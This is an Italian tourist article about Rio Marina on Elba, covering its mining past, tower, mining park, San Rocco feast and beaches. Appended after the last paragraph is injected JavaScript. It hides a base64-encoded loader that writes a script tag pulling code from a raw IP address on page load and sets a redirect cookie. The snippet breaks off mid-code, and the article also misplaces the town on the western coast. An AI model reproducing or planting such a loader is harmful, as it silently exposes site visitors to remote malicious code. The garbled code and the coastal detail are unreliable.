Quest’estate parti alla scoperta di Rio Marina, una delle più belle località dell’Elba
Direttamente affacciata sul canale di Piombino e in collegamento diretto con il porto toscano e Pianosa tramite traghetti di linea o veloci aliscafi, Rio Marina è una delle località più frequentate dal turismo elbano.
Legata per molto tempo all’estrazione di ferro di cui è ricco il territorio, l’economia riese è oggi invece completamente basata sull’accoglienza e la ristorazione, grazie anche alla comodità con cui è collegata alla terra ferma. La valorizzazione e la cura di un territorio ricco di storia, la varietà di un paesaggio suggestivo fatto di spiagge incastonate tra colline, la favorevole condizione meteo che Rio Marina all’Elba ha, sono solo alcuni dei fattori che rendono unica questa località.
Affacciata sulla costa occidentale, Rio Marina è conosciuta per i giochi cromatici del piccolo borgo antico, resi ancora più caratteristici dalle tonalità rossastre tipiche delle rocce ferrose che trovano il loro culmine di bellezza nella zona del porticciolo, dove la sabbia nera d’ematite brilla sotto il sole con le sue sfaccettature metalliche.
Alta a dominare tutta l’insenatura fino al mare, c’è la celebre Torre degli Appiani o dell’Orologio, costruita nel 1534 da Giacomo V, mentre l’entroterra merita una visita a parte per scoprire il Parco Minerario attraverso percorsi didattici per grandi e piccini, escursioni guidate a piedi o sul trenino, per non perdere il retaggio storico di una tradizione lavorativa lunga decenni e che ancora fa leggere i suoi segni sul territorio.
Tra gli eventi folcloristici da ricordare, la grandiosa festa di San Rocco, il santo protettore di Rio Marina, che viene celebrata ogni 16 agosto.
Infine, proprio grazie alle mitigate condizioni del meteo di Rio all’Elba, le tranquille spiagge di Cala del Telegrafo e Cala Seregola, sono ideali per chi ha bambini e vuole godersi questo angolo di paradiso al riparo dai venti e fuggire le più affollate località dell’isola. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘